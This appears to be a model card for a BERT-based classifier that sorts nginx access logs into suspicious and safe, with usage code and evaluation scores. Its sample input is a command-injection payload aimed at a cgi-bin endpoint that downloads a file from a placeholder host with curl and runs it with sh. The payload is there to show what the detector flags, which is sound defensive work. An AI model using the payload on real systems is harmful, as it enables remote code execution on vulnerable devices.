Log Inspector
A pre-trained model for inspecting nginx access logs, based on [bert-base-cased](https://huggingface.co/bert-base-cased).
Quick Start
This model is designed to inspect nginx access logs. It can classify logs into suspicious and safe categories.
Usage Examples
Basic Usage
The input text must be formatted as follows:
"path: <path>; ref:<referrer>; ua:<user agent>;"
>>> from transformers import pipeline
>>> inspector = pipeline('text-classification', model="u-haru/log-inspector")
>>> inspector('path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;')
[{'label': 'LABEL_0', 'score': 0.9999788999557495}]
Here, class 0 (LABEL_0) represents a suspicious log, and class 1 (LABEL_1) represents a safe log.
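The input format required above can be built from raw log lines before they are passed to the model. The following is a minimal sketch, assuming the logs use nginx's default "combined" format; the names `COMBINED_LOG`, `format_log_entry`, and `from_combined_line` are hypothetical helpers and are not part of this model's repository.

```python
import re

# Assumption: nginx "combined" log format, i.e.
# $remote_addr - $remote_user [$time_local] "$request" $status
# $body_bytes_sent "$http_referer" "$http_user_agent"
COMBINED_LOG = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] '                      # client, ident, user, timestamp
    r'"(?:\S+) (?P<path>.*?) (?:HTTP/[\d.]+)" '      # method, request URI, protocol
    r'\d{3} \S+ '                                    # status, bytes sent
    r'"(?P<ref>.*?)" "(?P<ua>.*?)"$'                 # referrer, user agent
)


def format_log_entry(path, referrer="-", user_agent="-"):
    """Build the 'path: ...; ref:...; ua:...;' string the model expects."""
    return f"path: {path}; ref:{referrer}; ua:{user_agent};"


def from_combined_line(line):
    """Convert one combined-format access log line into model input."""
    match = COMBINED_LOG.match(line.strip())
    if match is None:
        raise ValueError("line does not look like nginx combined format")
    return format_log_entry(match["path"], match["ref"], match["ua"])


line = ('203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] '
        '"GET /index.html?x=1 HTTP/1.1" 200 612 "-" "curl/8.0.1"')
print(from_combined_line(line))
# path: /index.html?x=1; ref:-; ua:curl/8.0.1;
```

The resulting string can be passed directly to `inspector(...)`. Logs written with a custom `log_format` would need a different pattern.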
Advanced Usage
Using simpletransformers
>>> import torch
>>> from simpletransformers.classification import ClassificationModel
>>> use_cuda = True  # placeholder setting: set to False to force CPU
>>> param = {}  # placeholder: simpletransformers model args; an empty dict keeps the defaults
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> predictions, raw_outputs = model.predict(['path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;'])
>>> print(predictions)
[0]
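Both usage styles return class identifiers rather than names: the pipeline yields strings such as `LABEL_0`, while simpletransformers yields integers such as `0`. A small sketch of mapping either form to a readable name follows; `CLASS_NAMES` and `class_name` are hypothetical helpers, and the mapping itself comes from the class description above (0 is suspicious, 1 is safe).

```python
# Mapping taken from this README: class 0 = suspicious, class 1 = safe.
CLASS_NAMES = {0: "suspicious", 1: "safe"}


def class_name(label):
    """Return a readable name for 'LABEL_<n>' strings or integer class ids."""
    if isinstance(label, str):
        # 'LABEL_0' -> 0
        label = int(label.rsplit("_", 1)[-1])
    return CLASS_NAMES[label]


print(class_name("LABEL_0"))             # suspicious
print([class_name(p) for p in [0, 1]])   # ['suspicious', 'safe']
```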
Evaluation and Training
>>> import pandas as pd
>>> from simpletransformers.classification import ClassificationModel
>>> # torch must be imported; use_cuda and param are user-defined, as in the previous example
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> data = [["Suspicious log",0],["Safe log",1]]
>>> df = pd.DataFrame(data, columns=["text", "labels"])
>>> model.train_model(df)
>>> result, model_outputs, wrong_predictions = model.eval_model(df)
>>> print(result)
{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e-05}
The model was trained with 9500 access logs. Here is the evaluation score:
{'mcc': 0.993114718313972, 'tp': 1639, 'tn': 729, 'fp': 0, 'fn': 7, 'auroc': 0.9994166345815686, 'auprc': 0.9997937194890235, 'eval_loss': 0.020282083051662583}
The evaluation result on 10000 logs:
{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}
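The `mcc` values above can be reproduced from the reported confusion-matrix counts using the standard Matthews correlation coefficient formula. The sketch below is an illustration, not the project's evaluation code; `mcc` is a hypothetical helper, and it assumes the counts follow the usual binary convention in which class 1 (safe) is the positive class.

```python
import math


def mcc(tp, tn, fp, fn):
    """Matthews correlation coefficient from confusion-matrix counts."""
    denom = math.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
    if denom == 0:
        # Conventional fallback when a row or column of the matrix is empty.
        return 0.0
    return (tp * tn - fp * fn) / denom


first = mcc(tp=1639, tn=729, fp=0, fn=7)     # first evaluation above
second = mcc(tp=9964, tn=26, fp=0, fn=10)    # evaluation on 10000 logs
print(round(first, 4), round(second, 4))     # 0.9931 0.8494
```

The second score is lower even though only 10 of 10000 logs are misclassified: the negative class holds just 26 logs, so 10 false negatives weigh heavily in a metric that accounts for class imbalance.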
Documentation
The source code for training is available here: [github.com/u-haru/log-inspector](https://github.com/u-haru/log-inspector)
License
This project is licensed under the Apache 2.0 license.